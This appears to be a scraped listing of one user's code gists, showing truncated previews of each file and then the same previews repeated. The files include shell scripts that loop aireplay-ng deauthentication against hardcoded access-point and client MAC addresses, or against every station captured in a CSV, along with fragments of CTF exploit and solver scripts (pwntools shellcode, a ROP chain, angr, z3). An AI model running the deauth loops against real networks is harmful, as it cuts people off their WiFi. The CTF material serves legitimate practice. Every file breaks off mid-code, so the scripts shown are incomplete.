Aneesh Dogra lionaneesh

## noWifiForYou.sh
ACCESS_POINT="C4:0A:CB:2D:81:B4"
DEVICE_POINT="A4:DB:30:D9:55:14"

while :
do
sudo aireplay-ng -0 1 -a "$ACCESS_POINT" -c "$DEVICE_POINT" mon0 --ignore-negative-one;
sleep 1
done

## noWifiForYouAll.sh
FILE="mypacket.csv-01.csv"

while :
do
for i in `cat victims-01.csv | awk '/Station MAC/{y=1;next;}y' | sed 's/, /,/g' | awk -F "," '/1/ {print $1 "|" $6}' | grep -v "(not associated)"`:
do
ACCESS_POINT=`echo "${i::35}" | awk -F "|" '{print $2}'`
DEVICE_P=`echo "${i::35}" | awk -F "|" '{print $1}'`
COUNTER=0
while [ $COUNTER -lt 40 ]; do

## receiver.py
import time

import uinput

import socket
import sys

from thread import *
HOST = ''   # Symbolic name, meaning all available interfaces
PORT = 9123 # Arbitrary non-privileged port

## get_list_of_likes.py
import requests
import json

post_id = <POST_ID>
access_token = "<ACCESS_TOKEN>"
template = "https://graph.facebook.com/v2.4/%d?fields=likes&access_token=%s"
url = template % (post_id, access_token,)
likes = []
first = True
while 1:

## cookie_math_solution_angr.py
#!/usr/bin/env python2
import angr # angr-5.6.8.22
import simuvex
import logging

class __printf_chk(simuvex.SimProcedure):
    def run(self):
        print 'useless'

p = angr.Project("./packer-release", load_options={'auto_load_libs': False})

## katy_csaw_2016_solution.py
#!/usr/bin/env python
from z3 import *

s = Solver()
ret = BitVecVal(0, 32)
seed = BitVec('seed', 32)
ret = 25214903917 * seed + 11
ret = ret & 0xFFFFFFFFFFFF
s.add(ret == 1364650861) # 1364650861, 1208101748

## gdb_bank_sect2017.py
import gdb
import sys
import os

class MyBreakpoint(gdb.Breakpoint):
    def stop (self):
        return True

gdb.execute('file ./bank_patched')
MyBreakpoint("*0x555555554c56")

## pwn_bank_sect2017.py
from pwn import *
import subprocess
context(arch='amd64', os='linux', log_level='info')
name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
def get_treasure(r):
    #pass login and leak rand.
    print r.recvuntil("Username: ")
    r.send(name_payload) # 8 characters of input, 1 byte overflow.
    a = r.recvuntil('#> ')
    print a

## tamu_pwn5.py
from pwn import *

e = ELF('./pwn5')
first_name_addr = 0x080F1A20
last_name_addr  = 0x080F1A9F
exit = e.symbols['exit']
def get_rop():
	#!/usr/bin/env python
	# Generated by ropper ropchain generator #
	from struct import pack

## goaudit_logstash.conf
input {
  tcp {
    port => 15530
    type => syslog
  }
  udp {
    port => 15530
    type => syslog
  }
}
	ACCESS_POINT="C4:0A:CB:2D:81:B4"
	DEVICE_POINT="A4:DB:30:D9:55:14"

	while :
	do
	sudo aireplay-ng -0 1 -a "$ACCESS_POINT" -c "$DEVICE_POINT" mon0 --ignore-negative-one;
	sleep 1
	done
	FILE="mypacket.csv-01.csv"

	while :
	do
	for i in `cat victims-01.csv \| awk '/Station MAC/{y=1;next;}y' \| sed 's/, /,/g' \| awk -F "," '/1/ {print $1 "\|" $6}' \| grep -v "(not associated)"`:
	do
	ACCESS_POINT=`echo "${i::35}" \| awk -F "\|" '{print $2}'`
	DEVICE_P=`echo "${i::35}" \| awk -F "\|" '{print $1}'`
	COUNTER=0
	while [ $COUNTER -lt 40 ]; do
	import time

	import uinput

	import socket
	import sys

	from thread import *
	HOST = '' # Symbolic name, meaning all available interfaces
	PORT = 9123 # Arbitrary non-privileged port
	import requests
	import json

	post_id = <POST_ID>
	access_token = "<ACCESS_TOKEN>"
	template = "https://graph.facebook.com/v2.4/%d?fields=likes&access_token=%s"
	url = template % (post_id, access_token,)
	likes = []
	first = True
	while 1:
	#!/usr/bin/env python2
	import angr # angr-5.6.8.22
	import simuvex
	import logging

	class __printf_chk(simuvex.SimProcedure):
	def run(self):
	print 'useless'

	p = angr.Project("./packer-release", load_options={'auto_load_libs': False})
	#!/usr/bin/env python
	from z3 import *

	s = Solver()
	ret = BitVecVal(0, 32)
	seed = BitVec('seed', 32)
	ret = 25214903917 * seed + 11
	ret = ret & 0xFFFFFFFFFFFF
	s.add(ret == 1364650861) # 1364650861, 1208101748
	import gdb
	import sys
	import os

	class MyBreakpoint(gdb.Breakpoint):
	def stop (self):
	return True

	gdb.execute('file ./bank_patched')
	MyBreakpoint("*0x555555554c56")
	from pwn import *
	import subprocess
	context(arch='amd64', os='linux', log_level='info')
	name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
	def get_treasure(r):
	#pass login and leak rand.
	print r.recvuntil("Username: ")
	r.send(name_payload) # 8 characters of input, 1 byte overflow.
	a = r.recvuntil('#> ')
	print a
	from pwn import *

	e = ELF('./pwn5')
	first_name_addr = 0x080F1A20
	last_name_addr = 0x080F1A9F
	exit = e.symbols['exit']
	def get_rop():
	#!/usr/bin/env python
	# Generated by ropper ropchain generator #
	from struct import pack
	input {
	tcp {
	port => 15530
	type => syslog
	}
	udp {
	port => 15530
	type => syslog
	}
	}